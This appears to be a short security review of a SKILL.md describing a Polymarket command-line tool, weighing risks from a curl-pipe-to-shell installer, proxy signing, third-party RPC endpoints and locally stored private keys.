polymarket-cli

This SKILL.md documents a plausible and legitimate CLI for interacting with Polymarket markets and on-chain contracts. The principal supply-chain/security concerns are (1) the provided curl|sh install pattern which executes a remote script — a high-risk distribution pattern even when hosted on GitHub, and (2) use of proxy signing and third-party RPC endpoints (e.g., https://polygon.drpc.org) without explicit, auditable details about how keys and signed payloads are forwarded or stored. Reading private keys from env or a local config file is expected for a CLI that signs transactions, but it concentrates secrets and should be paired with clear guidance about secure storage, opt-in proxy usage, and how to verify the integrity of installers. Overall, the content is not demonstrably malicious, but the installer pattern and opaque proxy/RPC usage create a measurable supply-chain risk; users should prefer building from source or auditing the install script, and avoid supplying private keys to any proxy unless they trust and have audited that service.